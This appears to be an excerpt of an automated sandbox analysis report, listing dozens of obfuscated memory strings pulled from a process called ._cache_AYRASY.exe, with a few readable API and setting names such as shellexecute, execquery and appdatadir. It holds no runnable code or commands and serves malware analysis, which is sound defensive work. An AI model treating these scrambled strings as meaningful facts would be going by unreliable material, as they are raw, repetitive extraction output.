                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i7tr7nj9bsmemstr_6eec7023-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4v*memstr_24439022-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4v%memstr_f1e2e45c-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405034j1884050374v<memstr_c7e3ac08-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5tr7memstr_e448ee8c-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vmemstr_4801fed1-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w5tmemstr_e9cf7efb-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t4vmemstr_08f1b707-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5tmemstr_f4e51c96-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i8bx1zm7wmemstr_e1ec11f9-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w7iu5kmemstr_c9335370-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w3sk4vmemstr_eb14d0c1-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f0cv4vm9nd2womemstr_c7cbc3a2-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f0cv4vm9nd2wfmemstr_c38ed4d1-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5tamemstr_e192cec7-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2j7wxmemstr_638ef503-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2jsmemstr_00f47b43-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vjmemstr_5d4ae707-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t\memstr_92d13ca5-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5twmemstr_fb2cc036-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b1xs9wu1ym2g.memstr_0794b33d-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i8bx1zm7w)memstr_2d649516-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t memstr_771cf534-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t;memstr_99b0bc18-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b2kv4rk7iu5k2memstr_b9d91691-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b1xs9wu1ym2gmemstr_6484d4a0-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4p7ememstr_fe23dced-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5xl9kj0ba0dmemstr_1e6934c6-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7ememstr_3434016e-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c9ug7dm1nmemstr_cd9d6943-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6bl5zq8rmemstr_75db682d-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4pmemstr_3f4e0d9b-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6tm6rb6vmemstr_e6625f62-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6gf6bl5zq8rmemstr_7b0496f0-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: loopq8ro}memstr_1f9a8002-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7eh}memstr_4176d0bd-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6tm6rb6vinee}memstr_bbc73176-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4p{}memstr_ac13ff3b-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7eq}memstr_166654fb-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6gf6bl5zq8rj}memstr_1bcb1532-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4pg}memstr_b5c86a53-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7e@}memstr_fc78fa68-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c9ug7dm1n]}memstr_69baa1f7-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0ca0sr7ev}memstr_1f1d5654-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6gf6bl5zq8rs}memstr_1b120154-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rror,}memstr_3a40019d-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8h8v)}memstr_29e0bec1-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f0hm3bh8a"}memstr_fb1c0e7e-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f0hm3bh8amal?}memstr_aae9622c-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4xi4sa8omemstr_349150b5-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vtememstr_420008a4-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2wmemstr_b814d83d-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mmemstr_f8653ef6-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8h8vmemstr_8e08ba22-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vmemstr_f74f5620-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hmemstr_11faae07-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c0ds9xx3uu8vmemstr_6b66f91f-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osversion8vmemstr_fc66af35-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8smemstr_ca94f8a0-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8hmemstr_b5159dd3-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vxpmemstr_d753631c-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sw_shownormalmemstr_cf826605-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a7mmemstr_f7f827ba-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f0hm3bh8amemstr_154327c8-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h2sc8smemstr_ea8b33fe-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z7nx8hm0hmemstr_b4809194-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: applicationmemstr_a5fd8836-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vtememstr_7002bfe9-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentn|memstr_76c6acc6-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0wk|memstr_b307eb01-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hd|memstr_eeffb985-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecutea|memstr_44ffc8c9-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4xi4sa8oz|memstr_886fbb29-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8h8vw|memstr_7bc6856b-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2wp|memstr_9d370c75-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findwindowswm|memstr_608b1760-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8sf|memstr_187a511f-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: extended\|memstr_db7741c0-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8sy|memstr_a7672255-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mr|memstr_9a78e62f-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4xi4sa8o/|memstr_9f0dd266-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c0ds9xx3uu8v%|memstr_256c4b26-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405091;|memstr_6f9425c5-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m4|memstr_72b9b063-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q6gh6lt1o1|memstr_efcbb203-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0w|memstr_671d167f-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0amemstr_64451754-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m3bi6fc9ay0xmemstr_df5363c6-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execquerymemstr_6969b5cd-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2eb9na0a7mmemstr_4f198b9a-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0wmemstr_adfb356e-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8smemstr_6e6942cc-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2eb9na0amemstr_8e18dfaf-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2eb9na0a0wmemstr_c91af37e-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: displaynamej{memstr_c9e6975a-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0wg{memstr_c4bc75b9-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w`{memstr_e636f695-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m3bi6fc9ay0x}{memstr_c5f8b195-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405091v{memstr_5ed7ff6b-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8ss{memstr_985a102e-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8sl{memstr_8c6c4277-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hb{memstr_bb3f4c0c-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w7m_{memstr_243b46f7-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a7mx{memstr_6a050ddf-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hu{memstr_ad9321d7-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h.{memstr_c1f04e98-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0w+{memstr_e03fc5e1-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h${memstr_fd60883f-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a7m!{memstr_bfda8da5-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w:{memstr_e2ba63a9-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m7{memstr_76eee908-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a5h0{memstr_a5212589-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: productstatememstr_835c804d-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6xh2sc8smemstr_ba0cbe98-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6cx1de0wmemstr_386ab926-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p9fw1cq6dmemstr_6801b0e4-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hmzmemstr_282d122f-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8sczmemstr_6e013d70-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: de0wrzmemstr_2b59ab7a-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mezmemstr_dc3c4a44-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v3fd5jh1al9x^zmemstr_7ceb5a47-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w[zmemstr_66b8d145-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8stzmemstr_01bd694f-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0aqzmemstr_429db2eb-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w*zmemstr_a20974c1-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0w'zmemstr_1220b32f-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a6zmemstr_91ba4074-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w8gh6xj8m3zmemstr_e9632e19-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l3cy5rl7mu9tzmemstr_e18413a5-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userprofiledirmemstr_05e7e6c5-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e0yu4to4mmemstr_02430501-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m7ou4td9bmemstr_6972871e-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z2nq4ft7qw0zzmemstr_6b777840-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u7rh3pp5v5hmemstr_d58532f5-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n2xx6fr2hmemstr_57c8061e-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iledirmemstr_b517ccbc-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9lb6kn0jmemstr_f71dc2fe-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4rs9cc4ymemstr_c0d50183-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8eo4bx8xmemstr_d9fdcc69-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u7rh3pp5vmemstr_e163c431-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v3fd5jh1al9xmemstr_6427adb2-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z2nq4ft7qw0zmemstr_bb46ccf7-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f3sy9hf6fmemstr_0a56bb0b-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2sg2zk4kmemstr_24778577-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8siymemstr_c24ea0c5-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2wxymemstr_d94cde37-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7muymemstr_b386d7e2-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hnymemstr_7ebb9851-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8skymemstr_25ed6845-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mdymemstr_7a5b45f7-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9tt7ou5haymemstr_2a71fb1c-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8szymemstr_19202050-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2wpymemstr_5bf7c5a5-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a9t-ymemstr_2d19f01f-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadir&ymemstr_4159e0ce-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h#ymemstr_d53fcf04-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m<ymemstr_ad48fbfb-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8s9ymemstr_e153f208-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h2ymemstr_fc382bee-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w7mmemstr_ad95a037-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l3cy5rl7mu9tmemstr_d5bb0806-5
